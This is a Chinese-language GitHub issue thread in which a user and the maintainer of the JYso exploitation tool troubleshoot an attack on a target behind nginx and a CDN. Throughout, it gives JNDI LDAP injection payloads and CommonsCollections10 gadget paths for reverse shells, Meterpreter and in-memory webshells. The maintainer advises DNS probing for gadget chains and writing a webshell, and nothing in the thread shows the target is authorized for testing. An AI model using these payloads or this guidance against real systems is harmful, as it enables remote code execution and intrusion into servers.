qi4L
commented
5 months ago 在客户端的Payload发我看
Closed hatnoop closed 5 months ago
qi4L
commented
5 months ago 在客户端的Payload发我看
hatnoop
commented
5 months ago ${jndi:ldap://xxxx:1389/TomcatBypass/cmsMSBYNC}
qi4L
commented
5 months ago ${jndi:ldap://xxxx:1389/TomcatBypass/E-cmsMSBYNC}
hatnoop
commented
5 months ago 非常感谢 已经不报错了,但很遗憾没有注入成功 请教您一个问题,遇到下面这种情况应该使用JYso的哪个payload更合适呢 java11 不出网 打不了回显(先返回响应报文,稍等一两秒才会加载ldap) nginx+cdn
qi4L
commented
5 months ago 先用URLDNS看有没有链子用
hatnoop
commented
5 months ago linux.zcajwrfish.xxxxxx.cn cc41.zcajwrfish.xxxxxx.cn cc40.zcajwrfish.xxxxxx.cn cc322.zcajwrfish.xxxxxx.cn cc31or321.zcajwrfish.xxxxxx.cn
qi4L
commented
5 months ago 用CC10去写webshell
hatnoop
commented
5 months ago 使用cc10出现以下问题 /Deserialization/CommonsCollections10/E-cmsMSBYNC /Deserialization/CommonsCollections10/cmsMSBYNC /Deserialization/CommonsCollections10/TomcatMemshell /Deserialization/CommonsCollections10/ReverseShell/xx.xx.xx.xx/8888 均提示 [+] Received LDAP Query : Deserialization/CommonsCollections10/cmsMSBYNC [+] GaddgetType : CommonsCollections10 [!] Exception >> Incorrect params >> Deserialization/CommonsCollections10/cmsMSBYNC
qi4L
commented
5 months ago 也可以按照网上不回显不出网RCE的方法,通过命令执行去写入webshell
hatnoop
commented
5 months ago 刚才经过测试Command/Base64是可以用的 我尝试执行 ping dnslog 和反弹shell都未收到任何请求 也有可能目标机器没有基础命令的环境 目前也不清楚绝对路径(无法通过js等文件定位写入) 😭
hatnoop
commented
5 months ago 所以想问是否能通过cc10直接写入内存马 或 使用Meterpreter等方式
qi4L
commented
5 months ago 可以试试直接反弹MSF 内存马在不知道中间件版本信息的情况下,比较看脸
hatnoop
commented
5 months ago 是我的使用方式有问题嘛 [+] Received LDAP Query : Deserialization/CommonsCollections10/Meterpreter/xxx/8888 [+] GaddgetType : CommonsCollections10 [!] Exception >> Incorrect params >> Deserialization/CommonsCollections10/Meterpreter/xxxx/8888
qi4L
commented
5 months ago 我才发现我MSF改的时候忘记写了,等着加上去
jndi tomcatbypass模式下所有的内存马注入提示 Error while generating or serializing payload 比如:cmsMSBYNC、proxyMSBYNC等...